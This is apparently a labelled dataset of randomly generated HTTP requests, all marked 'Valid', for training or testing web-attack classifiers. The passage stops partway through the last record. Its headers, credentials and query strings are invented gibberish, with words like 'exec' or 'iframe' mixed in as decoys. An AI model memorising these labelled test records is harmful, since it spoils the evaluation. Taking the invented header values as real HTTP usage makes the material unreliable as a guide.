X-Serial-Number: 6641279926067
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47069
Start - Id: 34337
class: Valid
PUT /oat/rVPVuNTfOEVd8HV/7yL/lalmsrmAitt7o1n/2oGp6EVMP1k-c1Ss_r.mdb? HTTP/1.1
Content-Length: 273
Content-Language: iitupa,D
Content-Encoding: compress
Content-Location: http://www.fnoMlceu.fr/ieari/unUUygu.jsp
Content-MD5: ZWFOaHJnY3RublJobm9yaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Jul 09 08:47:56 GMT
Last-Modified: Tue, 29 May 07 04:13:45 CET
Host: www.aUidiL.org
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253, euc-kr;q=0.4, koi8;q=0.6, utf-8;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 108.37.62.141
Cookie: cuIelsahs=s4
Cookie2: $Version="816"
Date: Sun, 19 Dec 04 24:51:34 UTC
ETag: W/"rAfen5-WrvFEq@B"
Expect: 100-continue
From: 8Tmtnybi@toleu.gov
If-Modified-Since: Fri, 09 Jan 09 06:29:20 UTC
If-Unmodified-Since: Thu, 08 Jan 04 22:14:04 UTC
If-Match: "VvpHNcv8gpaTR1l@mT"
If-None-Match: "bGvMjdQJA7WH8_jir"
If-Range: Tue, 09 Feb 10 08:51:01 GMT
Max-Forwards: 0
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: NTLM ZWFPMXBpZDhzZW5hbXJhY2FtZWhhcXVlb283dGFyYW9h
Range: 62994-447,-81
Referer: /pi6Mo/tri6toa.php
TE: gzip;q=0.4,trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/7.4 (compatible; MSIE 7.9; Open BSD i386; oOselao; qbNeil8c)
UA-CPU: Sparc
UA-Disp: 3186,9762,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9714x0556
Via: 6.6 166.42.247.152:908, 6.9 www.ncsi6.shtml
Transfer-Encoding: gzip
Upgrade: rdr/6.4, 3nxf/4.2, 62a3t/9.7, gmOIe/2.2, sz3/4.6
Warning: 830 www.ndsewSo.js "aobkso1dzEcidmsi" "Thu, 21 Apr 05 23:28:02 GMT"
X-Forwarded-For: 143.200.9.7
X-Serial-Number: 57690312658
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

hcoy=o9fcTe  Nbd$e&tntlan1e=710050&6rZnoe0fnh=iNzk3eSQ&fb8eergrtrl6y=AiEErebsi+t&rGFBkROC=R&talcH=15709&o2ElrfByepohxiv=4&3metieoen=0home&ANbI8yDsg=eOw8N feto &stn0eiehsepewr=mbz-ltnhdmo&3ai=ein&jhidee=ac~or&lphnnit=eHyiwoNbn&es=9ie &k9Iamiayns9a6e=anulln ea?eerexi

End - Id: 34337
Start - Id: 27143
class: Valid
GET /nbgWf/eaJzmyP/9_C0abMw7bSZHD0/B7PMDsock_stream7cLe.jpeg?slqxTsefnadur=+4a1echo&vh4CFFTx=r%40EHYy5L.1&aGN0x5=389&qtEcy0ena=5635&eyderHeas3r=N1isqipseMDXkl3a&mfohs0eNioytD=lioechoni&ss9vint6rse=ndynrniz%3A-b2+re&ht1teasihw=62054&t9padi1eiorhc=59985&3Pm44P=qlike8thd%5Dnph-&ao=metaiframe%5DaiaG&p7ybihEokt=ezC&8epb=t+inerelusre9j&t7qrpa5=oG-&PvIliSsh1reof6b=eVd3 HTTP/1.0
Host: 6.227.58.27
Connection: mNh6en
Accept: */*
Accept-Charset: shift_jis;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=15
Client-ip: 2.150.155.142
Cookie: renceabhtrecl=niE8Twioocsfdnd;BkJW7nQIA=scdnisjg6;T3i=t:e;ite3nhH=vn0;nEhsns0n7A=0779231;tast9rRE=52996
Cookie2: $Version="304"
Date: Fri, 13 Jan 06 15:35:58 CET
ETag: "EqroVsI170GggWVYKj"
Expect: 100-continue
From: tiqc@jnte.gov
If-Modified-Since: Thu, 29 May 08 10:15:07 GMT
If-Unmodified-Since: Wed, 26 Mar 08 20:13:51 UTC
If-Match: "tTePC_n2GibXNaxxYTbW"
If-None-Match: *
If-Range: *
Max-Forwards: 25
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic NWFvbjpzbW5zcndC
Authorization: Basic RWxFaTpsZWFkdA==
Range: 876-071,453044-67,-1
Referer: http://www.qldh.com/antms/actii/6iMeaj4/caNoeaii/sha8ne.tar.gz
TE: trailers
Trailer: Accept
User-Agent: f4bEgdti79oeinhr
UA-CPU: x86
UA-Disp: 940,210,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 778x8944
Via: 3.1 www.dnengdj1.htm, gC6RL/1.8 www.r9tyr8.jpeg, vema/0.4 44.10.140.1
Transfer-Encoding: identity
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27143
Start - Id: 20936
class: Valid
GET /s4henaefr7yopdmet/bTlUiobw1tHjIFZK/1neTnektm/hBhntrlr/iew/g2jr9NJU5@zsn6G/amzJu.Wp7ltYyC5_66OH/ls_t6SzWpC_v@SkwyGF/95VQeS_QI/DonaerT1t.pl?rS=tenfex-tNwp-&6cdeathuhh1t=BTptits&aeadmxWhEwb=yyi&SSe7e=ykeb33aiwjt8&tioerrtrTge=110127&httpjdz31a=5399&adh2w=%40aTv1&Q0ot=v%3Aa%5D-cRrvaellt+%7E&iatefhtmoirytit=87550314&WQk4uC6qexecgr0=08&absob=88310&VVmu%ubjlaglX=f9sxe&Oacohla3=jupdateehL&shrM2ititi=6m6eeSel8s0a HTTP/1.1
Host: 52.139.193.91
Connection: qmiei
Accept: */*
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: lisd6eh3-s23S;q=0.7
Cache-Control: max-stale=2
Client-ip: 176.75.134.165
Cookie: ltnmd=059;GzjLJ=jtidracceptt/;ET9OfiLtKxd='d;z56nmueusTvtt=t x%Vrats;esutp=r;ee4o=Lrwda
Cookie2: $Version="195"
Date: Fri, 27 Jan 06 10:28:14 CET
ETag: W/"@SwYjNEfjZMf_Kh4ulGE"
Expect: sbmyjz=nf9bml;nyae
From: d011d@jsutlttae.it
If-Modified-Since: Sat, 09 Jan 10 21:42:27 UTC
If-Unmodified-Since: Sat, 22 Jul 06 01:39:54 GMT
If-Match: "fuzcjQOvwRlxBHarH1"
If-None-Match: "aJSqmGDbyd5Kq95NA6k"
If-Range: "_ltRZ4Orx.c4zq-uNrJ"
Max-Forwards: 8
MIME-Version: 3.1
Pragma: ohmmy4I='tjotcset'
Proxy-Authorization: NTLM dGZtU3JiZGludDNZeW5pZWFkb3d5QXRiYTByemVzdDlzcGxpdmVuaWhsVGU=
Authorization: Basic VlN6ZWRscm46aGV3bmVj
Range: 91-032949,093525-505808
Referer: http://eOoufte.biz/Iawe.sh
TE: gzip;q=0.4,gzip
Trailer: Upgrade
User-Agent: Mozilla/4.0 (X11; U; Linux i386 0.8; hb-wu; rv:1.6.5) Gecko/09228255
UA-CPU: x86
UA-Disp: 0973,375,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 308x307
Via: tiia/8.6 140.193.219.130, HTTP/7.9 www.eeRbonbw.js, 8.1 19.221.82.149
Transfer-Encoding: deflate
Upgrade: de7/0.8, frcre/7.5
Warning: 328 40.44.180.235:467 "waPoatoStfremrctoitm" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 2430605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20936
Start - Id: 12053
class: Valid
GET /utuuvzitSaD/hitindsalt5/lkgseos8wmhn3eafIu/t0_documentg/5rNoXenraVsNmaoi/RD/pcReDOwxp_.tiff?2IJ3JMVNWRW=sh&EJt7wd=e&utsfk=20987&9suhssu5tan=lhotg HTTP/1.0
Host: 50.238.43.55:4
Connection: xiolTmeg
Accept: */*
Accept-Charset: euc-jp, cp-936
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 108.226.107.164
Cookie: yqonrz=yBx2xY;rm=rrnErftf;bodyAN.7lnullin0dbin=htnnt;niboKdailenbp=rhW;V6inXscriptedzphpLvP=63741647;it3r8b=pumdtlbhnnIa
Cookie2: $Version="64"
Date: Tue, 03 Feb 09 15:36:49 UTC
ETag: "WIlOg@PPWov@iWWMW"
Expect: 100-continue
From: nhae@UAtUg.cz
If-Modified-Since: Fri, 28 Aug 09 08:07:23 UTC
If-Unmodified-Since: Sat, 02 May 09 08:55:45 CET
If-Match: "4MToveLmRHFDgA_lZx-"
If-None-Match: *
If-Range: "caVruBpbr2ktX.cvom0t"
Max-Forwards: 19
MIME-Version: 2.2
Pragma: 0zrog='S'
Proxy-Authorization: Digest nc=BD5B8C8A
Authorization: tqfr wcRlcwe=beE5
Range: 421490-
Referer: /XEaAmras.js
TE: trailers
Trailer: Warning
User-Agent: hsnphtotrtrnbbnl
UA-CPU: 68000
UA-Disp: 859,2266,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 165x736
Via: 7.9 www.Tslqa3sq.jpeg, 4.3 97.206.83.175, 8.1 202.247.250.58
Transfer-Encoding: deflate
Upgrade: kymnd3/0.5, aRlm4/1.4, ejx/3.6, 0b3r/0.9
Warning: 109 162.109.30.41 "85mtwb" "Mon, 11 Jul 05 24:26:21 GMT"
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 21280
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12053
Start - Id: 25717
class: Valid
GET /kXA.asp? HTTP/1.0
Host: www.jniesy.com:80
Connection: keep-alive
Accept: video/quicktime;q=0.5, audio/x-wav;q=0.3
Accept-Charset: isiri-3342;q=0.6, windows-1251;q=0.4, windows-1254, iso-8859-1;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: 3aTta=hama
Client-ip: 39.160.15.83
Cookie: Dei=cc8dtapGQMY_;eds=nnEr;r8nE6Z3R4=64;j8arn099dnu=yA/=
Cookie2: $Version="766"
Date: Fri, 09 Apr 10 21:58:59 CET
ETag: W/"djUo6Ljud8-mNba7BSm"
Expect: cgrlxu
From: rpMt@acyfsddga.fr
If-Modified-Since: Sun, 19 Jul 09 05:25:09 UTC
If-Unmodified-Since: Mon, 25 Dec 06 24:02:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 32
MIME-Version: 1.3
Pragma: ubeseru=0w4iit4
Proxy-Authorization: NTLM ZWZ1YXI1Y3FIaW50ZWVwNnRuYW5sb2FhSXJhaWFudHd5OWFlMW1rOVU=
Authorization: Digest response="6bADbfbE60cB8AF1f1ED500BAe807746"
Range: -1,27054-,1-75962
Referer: /atcmeen/tnw1dspe/mfoare.php4
TE: trailers,gzip;q=0.4
Trailer: Trailer
User-Agent: tjnRi22oanucx
UA-CPU: MIPS
UA-Disp: 7894,3200,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1468x714
Via: FTP/1.3 www.guoaecec.jpg, 3.1 www.euhmsh8t.js
Transfer-Encoding: 8sblar; edbom=es5net
Upgrade: ojeiet/9.9, woq/6.0, ttYs/5.7, urTi2/9.1
Warning: 290 www.CltSOC.jpeg "lorOta1roSd" 
X-Forwarded-For: 4.231.239.216
X-Serial-Number: 550159
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25717
Start - Id: 19306
class: Valid
GET /tl5Bal.B0_Rgm1A6/hgurFqEH1iq@i7/F9zauidDDxml5shutdown5drg.jpg?q0t6cayoYw=c+aLcnodeev+&4sajiaeenvlpeo=4935204&eoOpi=bfM&stsa=ooir%3E&Nurecs7ie6=sln4ei3jazlyfeEngt&wa=eeG&altbivtt5th=i9arxyeges&zaeeoeu=ftpaiOEetdtstformhen+rclocation&processing-instructionKqI=1797675&apieuxea=4208872&Ks3execM88=6+access_logo&bfyom4rauYstv=na2vvQFT4M&dcaid=sHht6eneutnco&servicesscriptVjsOkrleeo=tia&n8c=rzPOiYp5 HTTP/1.0
Host: 134.175.186.149
Connection: keep-alive
Accept: application/zip
Accept-Charset: x-mac-turkish, iso-8859-7, gb2312, iso-2022-jp, iso-8859-7;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=435
Client-ip: 168.251.210.242
Cookie: atbswsIt=910692;ensstsElg0d=84s;J5uHcatidv=nblwTdela;3i=0139969;XPb@hYtform=RQaHtEee5
Cookie2: $Version="298"
Date: Sun, 23 May 04 14:47:44 UTC
ETag: W/"LeVKcrgqvr6zKr57MVb"
Expect: i8bofocm=s9odE
From: eiioel@i3bTr2frih.st
If-Modified-Since: Tue, 14 Aug 07 17:33:13 UTC
If-Unmodified-Since: Mon, 21 Feb 05 15:51:19 UTC
If-Match: *
If-None-Match: "USSvAzRlZcFARKOq4"
If-Range: Fri, 06 Jun 08 14:09:58 CET
Max-Forwards: 2
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic aW9EbTNpMjp0cnVwZQ==
Authorization: NTLM aWFlY2lwZWhvbGNjZWt0bmltOHkzckVlZUM3dHRsbkVvODhoZXRubnNt
Range: 4-457,-32
Referer: http://Ne9iiit.cz/JcyeRid/orie8Wl/ulkermfh.php
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 1.7; ea-6e; rv:9.1.7) Gecko/36775399
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 061x5553
Via: 3.0 www.gkef4uv2.shtml, FTP/9.2 99.200.72.88
Transfer-Encoding: qvoa; gdtu=ecAuzey
Upgrade: sahcq/0.1
Warning: 303 143.220.33.216 "entfvdtChoEcrKgtdi8" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 0947873125180577061
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19306
Start - Id: 27340
class: Valid
GET /lsWcz/access_lognDt4_3fBZnX0/Drn/j@CVM@MGd5Rd/a7ahhsjnlu/hHO@ve/xlibK3CuC6v0C/lJDevSIc/h_H9b/aIKGHGAFTpPSR2YMbN/4@lEC08@Pperl0-V.png?i8obdAeeoRera=305&ljep5si58adjgo=48&SpUgSYE2f=032537 HTTP/1.1
Host: www.aqeo1n.be
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-9, iso-8859-9;q=0.3, windows-1258, big5;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: geth-cs;q=0.9, BoOin-rAh;q=0.2, wrecadf-eiaiot;q=0.2, fjoDe-tatk;q=0.4
Cache-Control: no-store
Client-ip: 158.76.53.178
Cookie: Eiw=456069;eudtsrt=etea
Cookie2: $Version="4"
Date: Tue, 09 Aug 05 11:11:45 CET
ETag: "1miNIizWdS3oANro"
Expect: miA5rrrN=sefaeot;oiihka2m
From: aNo7@oOgoesyt.de
If-Modified-Since: Thu, 11 Feb 10 21:28:15 GMT
If-Unmodified-Since: Sat, 11 Oct 08 02:28:23 UTC
If-Match: *
If-None-Match: *
If-Range: "eRcuy.ajMecLj16P"
Max-Forwards: 529
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest nc=a9cB8b28
Authorization: rtw7o5 tmlGaErZ=tpgd
Range: 5136-,-1,40-
Referer: /onzHanf/gsrst/teuuaiy/g0est/srteh1.doc
TE: gzip;q=0.1
Trailer: Max-Forwards
User-Agent: Mozilla/6.8 (compatible; yg1eEse; Windows NT; rhtj; peOueqs)
UA-CPU: 68000
UA-Disp: 4083,795,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 904x688
Via: anyz/6.0 48.197.114.79
Transfer-Encoding: compress
Upgrade: oygdhG/5.2, mkl/7.7, atrtbx/4.3, rRu4lt/4.7
Warning: 310 www.wIblei.png "anibiOgti2Un" "Sun, 21 Feb 10 08:44:37 CET"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 99615814182881268
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27340
Start - Id: 8638
class: Valid
GET /B5AsSS0q/eaneoth3ctloshu/6a_4TwI/EH/tuief/pqSrzDGFVp3nL/i-YU7eAQUGpOyDSK4Oo/eq_sgF86427ECj6Rfi/ie3Ncmtntat1so/gQN.rt/epwe0_I07TOA.sh? HTTP/1.1
Host: 33.59.68.83:89
Connection: close
Accept: application/zip;q=0.4, text/*
Accept-Charset: utf-7, hz-gb-2312;q=0.4, ks_c_5601-1987, koi8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 245.251.141.105
Cookie: Srg5=/er;icere=sEApCS9aOw;typnl=16;iDpeeqnLceEao=536;vlsbispgaoiehix=Jsyep
Cookie2: $Version="424"
Date: Mon, 29 Mar 10 06:45:01 GMT
ETag: "OCzV3eeWDZdwE5-xvo"
Expect: 100-continue
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Sun, 01 Feb 04 15:41:28 GMT
If-Unmodified-Since: Sun, 14 Mar 04 18:52:10 UTC
If-Match: "eO863S-E4mp9uBYc2h6"
If-None-Match: "aLBaJWcd9-f8XQI19F"
If-Range: *
Max-Forwards: 9981
MIME-Version: 8.4
Pragma: ddnern=luh
Proxy-Authorization: Digest opaque="hnqcE"
Authorization: Basic RXJlaXhzOmZydmdkbw==
Range: -11,3-,96804-
Referer: http://eahansat.it/vwita/iCwkbrnr/iS2es.sh
TE: trailers
Trailer: Host
User-Agent: aeFvTs http://www.tttld.uk
UA-CPU: 68000
UA-Disp: 5087,858,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8393x485
Via: FTP/1.3 164.155.73.34, FTP/0.0 159.133.146.147:935, HTTP/1.8 www.ro5br.js
Transfer-Encoding: gzip
Upgrade: oAk/9.7, ylzLli/0.8, hne/4.9
Warning: 978 www.7otT.css "fraauadw2rek0lel5" "Sun, 20 Jul 08 18:39:31 CET"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8638
Start - Id: 11060
class: Valid
GET /0mailobjectMorP3Fht@/1V4Vlu.jpg? HTTP/1.0
Host: 99.177.148.142:77
Connection: keep-alive
Accept: audio/*;q=0.9, application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tenhpbe-loto5, 3-2cee, 6tfpr-rle;q=0.2
Cache-Control: no-cache
Client-ip: 224.189.199.226
Cookie: anfbsxstmeh=teFt
Cookie2: $Version="383"
Date: Tue, 31 Jan 06 16:31:49 GMT
ETag: "5ceGnLW7Rm.THDjabofc"
Expect: 7bds
From: e9esarYc@ncTsfi.org
If-Modified-Since: Sun, 25 Oct 09 15:34:52 CET
If-Unmodified-Since: Tue, 28 Jun 05 22:25:27 GMT
If-Match: *
If-None-Match: "Op7S5BASabSCVq6j8Ir"
If-Range: "_R0zJgU1ZQziPdB5X"
Max-Forwards: 0
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: aeeWg xqe5owa=r1ap5OA
Authorization: Digest username="Meeestct"
Range: -26420,731526-452811,442365-468
Referer: /mp1t/Wrc7/eeost.jsp
TE: chunked;q=0.9
Trailer: Trailer
User-Agent: Mozilla/0.7 (compatible; MSIE 6.0; Open BSD i386; r1r4; mrdmsn4b; ltt1lnoti)
UA-CPU: x86
UA-Disp: 0717,4017,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1068x1035
Via: FTP/1.9 79.70.171.163, neq/5.0 181.36.207.116
Transfer-Encoding: identity
Upgrade: orc/1.6, 9fle/6.2, 08otw/8.4, Zmleef/2.9, tDi/7.7
Warning: 864 42.215.124.198 "smicegomrl2AdEeez" 
X-Forwarded-For: 42.148.64.117
X-Serial-Number: 5468318216
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11060
Start - Id: 2955
class: Valid
GET /ziemnn9esorTltZc/kSlw5niakiOrsac/ib8lm78Niit.tiff?nfwaEfdZq6ilo=7894652726&rWithb4asTlh=ae%25eHsiht&eustkEnleRefs2=uianxmndcoesmne&Dp=aTFw&c8likeP@=slilad9ppiiedeHD7&iRnriamHszD=Aor&ho=onwmaeyntOrmtoi&ptlenc=l%40CuRdoRU&sp5yK_xdh7F4=0%40+%3Bge1processing-instructionusreeeUiL&teehdieca3=lcate8a&Vzj9Y_O7i=nU2hCF3.&sz6gpneie3=rtntrxmltaytipst HTTP/1.0
Host: www.tr0r.net
Connection: eu1kls
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: son-eaahn
Cache-Control: min-fresh=55805
Client-ip: 250.92.13.113
Cookie: Ie=tc;LEAX.rcpY_p=iw5dktrjtnrmegobject<ne;rtk2ioprougorzF=e3etcoe;6peojbtpiGf=neESoea;dtkwpNe=objectdtto
Cookie2: $Version="496"
Date: Fri, 07 May 04 16:17:38 UTC
ETag: "kqymBXwIb4BDZBZzH"
Expect: ljhh
From: Iohco@rBgrnzg.net
If-Modified-Since: Mon, 22 Oct 07 24:09:15 GMT
If-Unmodified-Since: Tue, 16 Oct 07 07:34:53 UTC
If-Match: *
If-None-Match: *
If-Range: "qaOY.1dd9XUz9G26HUt"
Max-Forwards: 163
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="si4s"
Authorization: Basic ZXRiMlQ6eHB6MHR2YQ==
Range: -6,9249-18
Referer: /btoye/tmstissq/wBsZ3/tvwkjegt.nsf
TE: chunked
Trailer: Date
User-Agent: Mozilla/1.9 (Windows; U; WinNT 9.7; Ve-uf; rv:5.8.0) Gecko/31849920
UA-CPU: StrongARM
UA-Disp: 088,2412,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8247x2505
Via: mtncim/5.9 www.qi5i.shtml, 0.5 www.laoha.tiff, HTTP/6.9 www.otnEc.jpg
Transfer-Encoding: emYo; qeose=3weH
Upgrade: l4ait5/5.0, alsllu/3.2
Warning: 723 242.127.187.64 "inXachdaie" 
X-Forwarded-For: 41.160.254.5
X-Serial-Number: 1920071
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2955
Start - Id: 32944
class: Valid
POST /TJhRinsert_i2f5A/cXjElr/y4j4Rm_Lt9v4MW@y/9W7j-eq2uSrW9GC8SrnW.htm? HTTP/1.0
Content-Length: 193
Content-Language: henhnrrr
Content-Encoding: gzip
Content-Location: /tee0iey/Oi3eg/IsaoPpz/O8th/ihod3crC.tiff
Content-MD5: NE85eWduT2FpT2V0YXB0Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Apr 09 09:11:24 GMT
Last-Modified: Sun, 02 Jan 05 05:14:54 CET
Host: www.at3s.gov
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.1
Accept-Language: siSon-reihku;q=0.1, 6d4oas-st3uincn, uatdth-opme7s;q=0.4
Cache-Control: max-stale
Client-ip: 121.110.242.162
Cookie: io4lo=1046;nsuoi=giseniepel;ic=npoLgvatEsmts;wRcf=aZPoaXp
Cookie2: $Version="85"
Date: Wed, 03 Nov 04 10:59:24 UTC
ETag: W/"DOb9BdBCTy1SOp-1Ll3F"
Expect: w4midakc
From: cpts@U3ei.ch
If-Modified-Since: Fri, 12 Dec 08 08:43:33 UTC
If-Unmodified-Since: Tue, 26 Dec 06 24:20:45 UTC
If-Match: *
If-None-Match: *
If-Range: "AusTlepsXeJi3LLB2A"
Max-Forwards: 877
MIME-Version: 2.6
Pragma: 5aR=xnliuee
Proxy-Authorization: f0icw moaxn9=bpnadt
Authorization: Digest nonce
Range: -5743
Referer: http://OAgu.gov/he7uol2/tIeMnu3s/socinpp.cfm
TE: gzip;q=0.0
Trailer: User-Agent
User-Agent: Mozilla/7.9 (compatible; MSIE 7.7; WinNT; rbes2h1)
UA-CPU: 68000
UA-Disp: 8787,462,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6323x133
Via: 9.1 191.42.182.68
Transfer-Encoding: identity
Upgrade: bja5e/7.6
Warning: 394 www.jtzhh.shtml "rqOo1hnnyjD" 
X-Forwarded-For: 185.226.175.55
X-Serial-Number: 8256064879987524435
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

7t1=sfSeDTQbn0Jh&qbeus=NtEfboe|pcf1mls saRsu&fm=crseh1rdouhsmastha&nu2etxlac87=qNs&srqvssHtseieEe=cmsAaaionf96sE&rcd4=ieb&rqeriaJi=hrQpBT1NB&1wWRannthm=715042&RPG1pojolsei=3&awnevD=rPZV0yJ2ry

End - Id: 32944
Start - Id: 13467
class: Valid
GET /sB0x7Sk-/iJjRa3.RXmUei/0XtVqeLyoow.swf?tiSA72oid=divie+9zoaQE&lt=744222996&lmErOpaih=taaatn+%40location4td&f6moxtttoeieh4=o5_o&OEx44WpI.CO=metatlfs&in=msoTetgtW&soasf5sa=9294259&oe8ecCniB=h2osknetteip%26n&ted=5uqAeoDernolssgnoc&tYaaUilngsu5Ex=pst&eekeurhmovnwne=ao-2fc%40-iRK&s7Alsdtuionq3sf=Tt0a2p&1ap=4995 HTTP/1.1
Host: www.olh4iatnao.be
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn, euc-cn;q=0.0, windows-1252;q=0.7, cp-936, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 35.217.124.230
Cookie: hzhe=220497;nohneapw9inni=g_MSghuj8-R
Cookie2: $Version="727"
Date: Sun, 06 Jun 04 13:10:07 CET
ETag: W/"Cw0SN.XTV22P_Xv"
Expect: 100-continue
From: ahyni5@nu8Ltehais.it
If-Modified-Since: Sat, 12 Mar 05 21:40:03 CET
If-Unmodified-Since: Tue, 29 Aug 06 22:45:58 CET
If-Match: "08zYpyik6-4PLVTj6"
If-None-Match: *
If-Range: Tue, 15 Jan 08 02:28:36 GMT
Max-Forwards: 086
MIME-Version: 2.1
Pragma: tsay4='v'
Proxy-Authorization: Digest nonce
Authorization: NTLM dExsY0VrbzNsaGlhYWFlZGJiOXJvdGVFaGxkYWRndXJpZW5vb3M5dHJsaGJlYW9z
Range: 7484-,8-,-979
Referer: /seap/Irag/ndNqenee/he6ce.jpeg
TE: deflate,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/1.8 (Windows; U; Win 9x 0.7; ro-tb; rv:8.3.7) Gecko/68499223
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 188x166
Via: HTTP/7.3 www.hpemyCm.css
Transfer-Encoding: compress
Upgrade: snoo/8.6, ikrhga/7.1, Sl9hli/2.0, ert8/9.2, vwtli/1.0
Warning: 540 www.tequrah.html "6nhY" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 648318819511788387
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13467
Start - Id: 5123
class: Valid
PUT /homL5/cb/e@_iA/en/eoiRGtk5Vv/EhFxcPcDQ4WCqXh/apDxl/nHwgOsnsnzfZos/gKPEjzFI3z2P9u2/eusknAvuRRmYe3WJuS/nw6UdD4.nsf? HTTP/1.1
Content-Length: 93
Content-Language: pmD,7e5dw,umc9hro
Content-Encoding: deflate
Content-Location: http://www.e7zi.net/aochee/snssxtzs/eeRR/xaairaok.tiff
Content-MD5: aGNuRUZvZ2U0VXhkb25paA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 May 09 14:20:52 CET
Last-Modified: Sun, 20 Sep 09 08:43:28 UTC
Host: www.sbsbdtsa.org
Connection: llr1
Accept: */*;q=0.4
Accept-Charset: iso-10646-ucs-2, x-mac-hebrew;q=0.5, x-mac-hebrew;q=0.0, iso-8859-7;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 248.66.62.28
Cookie: tumnescsmojue=hnihewctaonoro;4ow5ocwn=5;0sevuunoelltC=586365;fnoows1ah=sz;mVcu5s=-u@;3iIXqinclude_AJO7=lnh0d
Cookie2: $Version="67"
Date: Mon, 06 Aug 07 15:06:51 GMT
ETag: "Nw@nYqH4ZzSQAZWp"
Expect: etdb=edsrnttO
From: h1ato@oncfne.gov
If-Modified-Since: Thu, 24 Jan 08 11:14:28 CET
If-Unmodified-Since: Mon, 05 Mar 07 16:15:31 GMT
If-Match: *
If-None-Match: "UacvQCo97BJL_pGMAcu"
If-Range: *
Max-Forwards: 6
MIME-Version: 8.5
Pragma: ihkte=iprll
Proxy-Authorization: NTLM Y3RsNzFlc25hdmFoaHJsdVR1U2U0U2xvb3JlbHR3bEVoUnRlZWV1aWVhaA==
Authorization: Digest algorithm=MD5
Range: 106-414,-939400
Referer: http://lblft.st/taaN/bshlvsec/jtd3/se4is.asp
TE: trailers,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: ra2nah/6.0.2.5
UA-CPU: MIPS
UA-Disp: 761,4466,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 387x110
Via: 6.8 www.neweae.png
Transfer-Encoding: gzip
